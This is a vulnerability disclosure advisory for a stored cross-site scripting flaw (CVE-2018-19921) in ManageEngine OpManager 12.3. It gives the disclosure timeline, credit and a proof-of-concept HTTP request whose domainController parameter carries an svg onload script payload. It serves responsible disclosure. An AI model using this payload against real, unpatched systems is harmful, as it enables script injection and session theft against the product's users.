I. VULNERABILITY ------------------------- Zoho ManageEngine OpManager 12.3 before Build 123237 has XSS via the domainController API. II. CVE REFERENCE ------------------------- CVE-2018-19921 III. VENDOR ------------------------- https://www.manageengine.com IV. TIMELINE ------------------------- 20/11/18 Vulnerability discovered 20/11/18 Vendor contacted 06/12/2018 OPManager replay that they fixed V. CREDIT ------------------------- Murat Aydemir from Biznet Bilisim A.S. VI. DESCRIPTION ------------------------- ManageEngine OPManager product(version 12.3) was vulnerable to stored xss attacks. A successfully exploit of this attack could allow thief users sessions or arbitrary interpret javascript code on remote host. References: https://www.manageengine.com/network-monitoring/help/read-me.html, https://bugbounty.zoho.com/bb/info#hof VII. PoC ------------------------- POST /api/json/admin/updateDomainDetails?apiKey=5f5e26abc7bf2af2a5669cf258ec8385 HTTP/1.1 Host: vulnerablehost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://vulnerablehost/apiclient/ember/index.jsp Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 113 Cookie: JSESSIONID=XXXXXXXXXXXXXXXX; encryptPassForAutomaticSignin= XXXXXXXXXXXXXXXX; userNameForAutomaticSignin= XXXXXXXXXXXXXXXX; domainNameForAutomaticSignin=Authenticator; signInAutomatically=true; authrule_name=Authenticator; NFA__SSO= XXXXXXXXXXXXXXXX; opmcsrfcookie= XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX DNT: 1 Connection: close domainName=AA%22%3E&domainController=aa%22%3E%3Csvg%2Fonload%3Dconfirm('xss_in_domainController_parameter')%2F%2F cleartext of payload ">